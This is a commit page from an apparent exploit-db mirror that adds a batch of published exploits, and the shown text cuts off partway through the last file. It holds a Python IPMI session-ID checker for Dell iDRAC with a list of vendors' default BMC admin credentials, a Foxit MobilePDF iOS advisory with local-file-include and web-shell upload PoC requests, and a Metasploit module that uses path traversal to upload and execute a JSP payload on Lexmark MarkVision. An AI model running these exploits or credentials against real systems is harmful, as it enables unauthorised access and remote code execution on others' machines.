bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-01-15

Browse source 
10 new exploits
This commit is contained in:
Offensive Security 2015-01-15 08:37:04 +00:00
parent cbc2c5d09f
commit 97ea72788a
11 changed files with 1594 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -32220,3 +32220,13 @@ id,file,description,date,author,platform,type,port
35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager <= 8.5 iptm/eventmon Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager <= 8.5 iptm/eventmon Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0
35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager <= 8.5 iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager <= 8.5 iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0
35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager <= 8.5 iptm/logicalTopo.do Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager <= 8.5 iptm/logicalTopo.do Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0
35767,platforms/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,php,webapps,80
35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan, Koh",hardware,webapps,623
35771,platforms/osx/dos/35771.c,"OS X 10.10 Bluetooth DispatchHCICreateConnection - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0
35772,platforms/osx/dos/35772.c,"OS X 10.10 Bluetooth BluetoothHCIChangeLocalName - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0
35773,platforms/osx/dos/35773.c,"OS X 10.10 Bluetooth TransferACLPacketToHW - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0
35774,platforms/osx/dos/35774.c,"OS X 10.10 Bluetooth DispatchHCIWriteStoredLinkKey - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0
35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888
35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise Arbitrary File Upload",2015-01-13,metasploit,java,remote,9788
35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows FILE Privilege Abuse",2015-01-13,metasploit,windows,remote,0
35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 Shell Upload",2015-01-13,metasploit,php,remote,80

Can't render this file because it is too large.

430
platforms/hardware/webapps/35770.py Executable file
View file

@ -0,0 +1,430 @@
"""
For testing purposes only.
(c) Yong Chuan, Koh 2014
"""
from time import sleep
from socket import *
from struct import *
from random import *
import sys, os, argparse
HOST = None
PORT = 623
bufsize = 1024
recv = ""
# create socket
UDPsock = socket(AF_INET,SOCK_DGRAM)
UDPsock.settimeout(2)
data = 21 #offset of data start
RMCP = ('\x06' + #RMCP.version = ASF RMCP v1.0
'\x00' + #RMCP.reserved
'\xFF' + #RMCP.seq
'\x07' #RMCP.Type/Class = Normal_RMCP/IPMI
)
def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None):
auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}
sess_header = ''
sess_header += pack('<B', auth_types[auth_type])
sess_header += pack('<L', seq_num)
sess_header += pack('<L', sess_id)
if auth_type is not 'None':
raw = pwd + pack('<L', sess_id) + ipmi + pack('<L', seq_num) + pwd
import hashlib
h = hashlib.md5(raw)
sess_header += h.digest()
sess_header += pack('B', len(ipmi))
return sess_header
class CreateIPMI ():
def __init__ (self):
self.priv_lvls = {'Reserved':0, 'Callback':1, 'User':2, 'Operator':3, 'Admin':4, 'OEM':5, 'NO ACCESS':15 }
self.priv_lvls_2 = {0:'Reserved', 1:'Callback', 2:'User', 3:'Operator', 4:'Admin', 5:'OEM', 15:'NO ACCESS'}
self.auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}
def CheckSum (self, bytes):
chksum = 0
q = ''
for i in bytes:
q += '%02X ' %ord(i)
chksum = (chksum + ord(i)) % 0x100
if chksum > 0:
chksum = 0x100 - chksum
return pack('>B', chksum)
def Header (self, cmd, seq_num=0x00):
#only for IPMI v1.5
cmds = {'Get Channel Auth Capabilities' : (0x06, 0x38), #(netfn, cmd_code)
'Get Session Challenge' : (0x06, 0x39),
'Activate Session' : (0x06, 0x3a),
'Set Session Privilege Level' : (0x06, 0x3b),
'Close Session' : (0x06, 0x3c),
'Set User Access' : (0x06, 0x43),
'Get User Access' : (0x06, 0x44),
'Set User Name' : (0x06, 0x45),
'Get User Name' : (0x06, 0x46),
'Set User Password' : (0x06, 0x47),
'Get Chassis Status' : (0x00, 0x01)}
ipmi_header = ''
ipmi_header += pack('<B', 0x20) #target addr
ipmi_header += pack('<B', cmds[cmd][0]<<2 | 0) #netfn | target lun
ipmi_header += self.CheckSum (ipmi_header)
ipmi_header += pack('<B', 0x81) #source addr
ipmi_header += pack('<B', seq_num<<2 | 0) #seq_num | source lun
ipmi_header += pack('<B', cmds[cmd][1]) #IPMI message command
return ipmi_header
def GetChannelAuthenticationCapabilities (self, hdr_seq, chn=0x0E, priv_lvl='Admin'):
ipmi = ''
ipmi += self.Header('Get Channel Auth Capabilities', hdr_seq)
ipmi += pack('<B', 0<<7 | chn) #IPMI v1.5 | chn num (0-7, 14=current_chn, 15)
ipmi += pack('<B', self.priv_lvls[priv_lvl]) #requested privilege level
ipmi += self.CheckSum (ipmi[3:])
return ipmi
def GetSessionChallenge (self, hdr_seq, username, auth_type='MD5'):
#only for IPMI v1.5
ipmi = ''
ipmi += self.Header('Get Session Challenge', hdr_seq)
ipmi += pack('<B', self.auth_types[auth_type]) #authentication type
ipmi += username #user name
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def ActivateSession (self, hdr_seq, authcode, auth_type='MD5', priv_lvl='Admin'):
#only for IPMI v1.5
ipmi = ''
ipmi += self.Header('Activate Session', hdr_seq)
ipmi += pack('>B', self.auth_types[auth_type])
ipmi += pack('>B', self.priv_lvls[priv_lvl])
ipmi += authcode #challenge string
ipmi += pack('<L', 0xdeadb0b0) #initial outbound seq num
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def SetSessionPrivilegeLevel (self, hdr_seq, priv_lvl='Admin'):
#only for IPMI v1.5
ipmi = ''
ipmi += self.Header('Set Session Privilege Level', hdr_seq)
ipmi += pack('>B', self.priv_lvls[priv_lvl])
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def CloseSession (self, hdr_seq, sess_id):
ipmi = ''
ipmi += self.Header ("Close Session", hdr_seq)
ipmi += pack('<L', sess_id)
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def GetChassisStatus (self, hdr_seq):
ipmi = ''
ipmi += self.Header ("Get Chassis Status", hdr_seq)
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def GetUserAccess (self, hdr_seq, user_id, chn_num=0x0E):
ipmi = ''
ipmi += self.Header ("Get User Access", hdr_seq)
ipmi += pack('>B', chn_num) #chn_num = 0x0E = current channel
ipmi += pack('>B', user_id)
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def GetUserName (self, hdr_seq, user_id=2):
ipmi = ''
ipmi += self.Header ("Get User Name", hdr_seq)
ipmi += pack('>B', user_id)
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def SetUserName (self, hdr_seq, user_id, user_name):
#Assign user_name to user_id, replaces if user_id is occupied
ipmi = ''
ipmi += self.Header ("Set User Name", hdr_seq)
ipmi += pack('>B', user_id)
ipmi += user_name.ljust(16, '\x00')
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def SetUserPassword (self, hdr_seq, user_id, password, op='set password'):
ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3}
ipmi = ''
ipmi += self.Header ("Set User Password", hdr_seq)
ipmi += pack('>B', user_id)
ipmi += pack('>B', ops[op])
ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E):
ipmi = ''
ipmi += self.Header ("Set User Access", hdr_seq)
ipmi += pack('<B', 1<<7 | 0<<6 | 0<<5 | 1<<4 | chn) #bit4=1=enable user for IPMI Messaging | chn=0xE=current channel
ipmi += pack('>B', user_id)
ipmi += pack('>B', self.priv_lvls[new_priv])
ipmi += pack('>B', 0)
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def SendUDP (pkt):
global HOST, PORT, data
res = ''
code = ipmi_seq = 0xFFFF
for i in range(5):
try:
UDPsock.sendto(pkt, (HOST, PORT))
res = UDPsock.recv(bufsize)
except Exception as e:
print '[-] Socket Timeout: Try %d'%i
sleep (0)
else:
#have received a reply
if res[4:5] == '\x02': #Session->AuthType = MD5
data += 16
code = unpack('B',res[data-1:data])[0]
ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2
if res[4:5] == '\x02':
data -= 16
break
return code, ipmi_seq, res
def SetUpSession (username, pwd, priv='Admin', auth='MD5'):
global data
#Get Channel Authentication Capabilities
ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv)
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
if code != 0x00:
return code, 0, 0, 0
#print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq)
#Get Session Challenge
ipmi = CreateIPMI().GetSessionChallenge(1, username, 'MD5')
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
if code != 0x00:
if code == 0xFFFF:
print "[-] BMC didn't respond to IPMI v1.5 session setup"
print " If firmware had disabled it, then BMC is not vulnerable"
return code, 0, 0, 0
temp_sess_id = unpack('<L', res[data:data+4])[0]
challenge_str = res[data+4:data+4+16]
#print '[+]%-30s: %02X (%d)'%('Get Session Challenge', code, ipmi_seq)
#Activate Session
ipmi = CreateIPMI().ActivateSession(2, challenge_str, auth, priv)
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, auth, 0, temp_sess_id, pwd) + ipmi)
if code != 0x00:
return code, 0, 0, 0
data += 16
sess_auth_type = unpack('B', res[data:data+1])[0]
sess_id = unpack('<L', res[data+1:data+1+4])[0]
ini_inbound = sess_hdr_seq = unpack('<L', res[data+5:data+5+4])[0]
sess_priv_lvl = unpack('B', res[data+9:data+9+1])[0]
#print '[+]%-30s: %02X (%d)'%('Activate Session', code, ipmi_seq)
#print ' %-30s: Session_ID %08X'%sess_id
data -= 16
#Set Session Privilege Level
ipmi = CreateIPMI().SetSessionPrivilegeLevel(3, priv)
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_hdr_seq, sess_id) + ipmi)
sess_hdr_seq += 1
if code != 0x00:
return code, 0, 0, 0
new_priv_lvl = unpack('B', res[data:data+1])[0]
#print '[+]%-30s: %02X (%d)'%('Set Session Priv Level', code, ipmi_seq)
return code, temp_sess_id, sess_hdr_seq, sess_id
def CloseSession (sess_seq, sess_id):
global data
#Close Session
ipmi = CreateIPMI().CloseSession(5, sess_id)
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
#print '[+]%-30s: %02X (%d)'%('Close Session', code, ipmi_seq)
return code
def CheckSessionAlive(sess_seq, sess_id):
#SetUserPassword(): "user enable <user_id>"
ipmi = CreateIPMI().GetChassisStatus(31)
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq)
sess_seq += 1
return sess_seq
def banner():
print ("######################################################\n"+\
"## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\
"## (http://www.kb.cert.org/vuls/id/843044)\n"+\
"## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\
"## and checking that these values are incremental\n"+\
"## \n"+\
"## Author: Yong Chuan, Koh\n"+\
"## Email: yongchuan.koh@mwrinfosecurity.com\n"+\
"## (c) Yong Chuan, Koh 2014\n"+\
"######################################################\n")
def main():
banner()
#default usernames/passwords (https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi)
vendors = {"HP" :{"user":"Administrator", "pwd":""}, #no default pwd: <factory randomized 8-character string>
"DELL" :{"user":"root", "pwd":"calvin"},
"IBM" :{"user":"USERID", "pwd":"PASSW0RD"},
"FUJITSU" :{"user":"admin", "pwd":"admin"},
"SUPERMICRO" :{"user":"ADMIN", "pwd":"ADMIN"},
"ORACLE" :{"user":"root", "pwd":"changeme"},
"ASUS" :{"user":"admin", "pwd":"admin"}
}
arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values")
arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server")
arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)")
arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)")
arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)")
arg.add_argument("-p", "--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)")
args = arg.parse_args()
if args.vendor is not None: args.vendor = args.vendor.upper()
if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None):
print "[-] Error: -n and -p are required because -v is not specified/in default list"
print " Vendors with Default Accounts"
print " -----------------------------------"
for vendor,acct in vendors.iteritems():
print " %s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"])
sys.exit(1)
if args.username is None: args.username = vendors[args.vendor]["user"].ljust(16, '\x00')
if args.password is None: args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00')
global HOST, PORT
HOST = args.ip
PORT = args.udpport
print "Script Parameters"
print "-------------------------"
print "IP : %s"%HOST
print "Port : %d"%PORT
print "Username : %s"%args.username
print "Password : %s"%args.password
session_ids = []
for i in xrange(0x80): #do not go beyond 0xFF, because of how session_ids is checked for incremental later
try:
code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5')
if code == 0:
session_ids.append(temp_sess_id)
session_ids.append(sess_id)
print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id)
else:
#print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i)
sleep(5)
continue
code = CloseSession (sess_seq, sess_id)
if code == 0:
#print '[+%04X] Close Session OK'%(i)
i += 1
sleep (0.5)
else:
#print '[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i)
sleep(65)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print (exc_type, fname, exc_tb.tb_lineno)
session_ids = session_ids[:0xFF]
#get the first incremental diff
const_diff = None
for i in xrange(1, len(session_ids)):
if session_ids[i-1] < session_ids[i]:
const_diff = session_ids[i] - session_ids[i-1]
break
#check if session_ids are increasing at a fixed value
vulnerable = True
crossed_value_boundary = 0
for i in xrange(1, len(session_ids)):
if session_ids[i]-session_ids[i-1] != const_diff:
if crossed_value_boundary < 2:
crossed_value_boundary += 1
else:
vulnerable = False
if vulnerable:
print "Conclusion: BMC is vulnerable to CVE-2014-8272"
else:
print "Conclusion: BMC is not vulnerable to CVE-2014-8272"
if __name__ == "__main__":
main()

274
platforms/ios/webapps/35775.txt Executable file
View file

@ -0,0 +1,274 @@
Document Title:
===============
Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1400
Release Date:
=============
2015-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
1400
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
Foxit MobilePDF enables you to view and annotate PDF documents on the go, allowing you to work on your PDF documents anytime, anywhere.
Specify the permissions to restrict operations to PDF files, such as copying content, adding annotation, managing page & bookmark, and printing.
Share, store and synchronize PDF files.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/foxit-mobile-pdf/id507040546 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-01-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Foxit Corporation
Product: MobilePDF - iOS Web Application (Wifi) 4.4.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.
The local file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The vulnerability is located in the `filename` value of the wifi interface `upload` module. Local attackers are able to manipulate the
wifi web interface by usage of the vulnerable `upload` POST method request. The service does not encode or parse the `filename` context
on uploads. Attackers can include an existing local application path or an existing local device path as source in connection with script
code to compromise the iOS app. The execution of unauthorized local file or path request occurs in the index of documents module of the
wifi file service application after the inject. The request method to inject is POST and the attack vector is located on the application-side
of the affected iOS application.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
Exploitation of the local file include web vulnerability in the upload module requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include web vulnerability results in mobile application compromise or compromised device components.
Vulnerable Method(s):
[+] POST
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename (name)
Affected Module(s):
[+] Index of Documents (http://localhost:8888)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server.
The vulnerability is located in the filename value of the `upload` file module. Remote attackers are able to upload a php or js web-shell by a rename of the
filename with multiple extensions in the upload POST method request. The attacker uploads for example a web-shell with the following name and extension
`pentest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file in the wifi web-application interface. He deletes the .png file
extension and can access the webshell with elevated access rights to execute.
The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the arbitrary file upload vulnerability results in unauthorized file access (aap/device) and compromise of http web-server.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index of Documents (http://localhost:8888)
Proof of Concept (PoC):
=======================
1.1
The local file include vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Download and install the FoxIT MobilePDF iOS application
2. Surf to the Documents Index of the Wifi Server (http://localhost:8888)
3. Start to choose a file for the upload function by usage of the search
4. Intercept the session by usage of a tamper and change the name value to the local device path source
5. Continue the request and save the settings. After that go back to the Index of Documents
Note: The execution of the script code occurs in the vulnerable name value of the index file dir list
6. Successful reproduce of the security vulnerability!
PoC: Index of Documents (Name)
<tr><td><a href="/<img src="><img src="./[LOCAL FILE INCLUDE VULNERABILITY!]</a"></a></td><td align="center">file</td>
<td align="center"><span class="m">2015-01-10 13:49</span></td><td align="center"><span class="s">538 B</span></td></tr>
--- PoC Session Logs [POST] (File Include > Upload)---
Status: 200[OK]
POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3624] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8888]
User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8888/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3796507625132
Content-Disposition: form-data; name="button";
filename="./[LOCAL FILE INCLUDE VULNERABILITY!]+2.png"
Content-Type: image/png
--- PoC Session Logs [GET] (File Dir Index List)---
13:54:26.427[48ms][total 48ms] Status: 200[OK]
GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[142] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8888]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8888/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[142]
Date[Sa., 10 Jan. 2015 12:49:30 GMT]
Reference(s):
http://localhost:8888/
http://localhost:8888/%3C/./
1.2
The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: URL
http://localhost:8888/./webshell.png.html.php
PoC: Index of Documents
<tr><td><a href="/webshell.png.html.php.js.png">webshell.png.html.php.js.png</a></td>
<td align="center">file</td><td align="center"><span class="m">2015-01-10 13:58</span></td>
<td align="center"><span class="s">538 B</span></td></tr>
--- PoC Session Logs [POST] ---
14:03:16.481[149ms][total 1583ms] Status: 200[OK]
POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3883] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8888]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8888/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------282243582256
Content-Disposition: form-data; name="button"; filename="webshell.png.html.php.js.png"
Content-Type: image/png
Reference(s):
http://localhost:8888/
http://localhost:8888/./webshell.png.html.php
Solution - Fix & Patch:
=======================
1.1
The file include vulnerability can be paütched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request.
Restrict the filename input and filter with an own set exception to prevent application-side attacks.
Parse also in the Index of Documents the vulnerable name output value to solve the issue.
1.2
Restrict the vulnerable `filename` value and implement a secure filter mechanism with own exception to prevent the upload of files with multiple extensions.
Restrict the upload folder and disallow the execution of files that are already uploaded.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POSt method request is estimated as high. (CVSS 6.9)
1.2
The security risk of the arbitrary file upload vulnerability in the upload POST method request is estimated as high. (CVSS 6.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

155
platforms/java/remote/35776.rb Executable file
View file

@ -0,0 +1,155 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
attacker to upload arbitrary files, including arbitrary JSP code. This module has been
tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
},
'Author' =>
[
'Andrea Micalizzi', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-8741'],
['ZDI', '14-410'],
['URL', 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US']
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Lexmark Markvision Enterprise 2.0', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 09 2014'))
register_options(
[
Opt::RPORT(9788),
OptString.new('TARGETURI', [true, 'ROOT path', '/'])
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, 'mve', 'help', 'en', 'inventory', 'am_about.html')
})
version = nil
if res && res.code == 200 && res.body && res.body.to_s =~ /MarkVision Enterprise ([\d\.]+)/
version = $1
else
return Exploit::CheckCode::Unknown
end
if Gem::Version.new(version) <= Gem::Version.new('2.0.0')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
jsp_leak = jsp_path
jsp_name_leak = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"
# By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled
# Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT
traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf"
print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...")
if upload_file(traversal_leak, jsp_leak)
print_good("#{peer} - JSP successfully uploaded")
else
fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
end
res = execute(jsp_name_leak)
if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/
upload_path = $1
print_good("#{peer} - Working directory found in #{upload_path}")
register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak))
else
print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
end
jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
jsp_payload = payload.encoded
traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf"
print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...")
if upload_file(traversal_payload, jsp_payload)
print_good("#{peer} - JSP successfully uploaded")
register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path
else
fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
end
print_status("#{peer} - Executing payload...")
execute(jsp_payload_name, 3)
end
def upload_file(filename, contents)
good_signature = rand_text_alpha(4 + rand(4))
bad_signature = rand_text_alpha(4 + rand(4))
post_data = Rex::MIME::Message.new
post_data.add_part(good_signature, nil, nil, 'form-data; name="success"')
post_data.add_part(bad_signature, nil, nil, 'form-data; name="failure"')
post_data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'mve', 'upload', 'gfd'),
'method' => 'POST',
'data' => post_data.to_s,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if res && res.code == 200 && res.body && res.body.to_s.include?(good_signature)
return true
else
return false
end
end
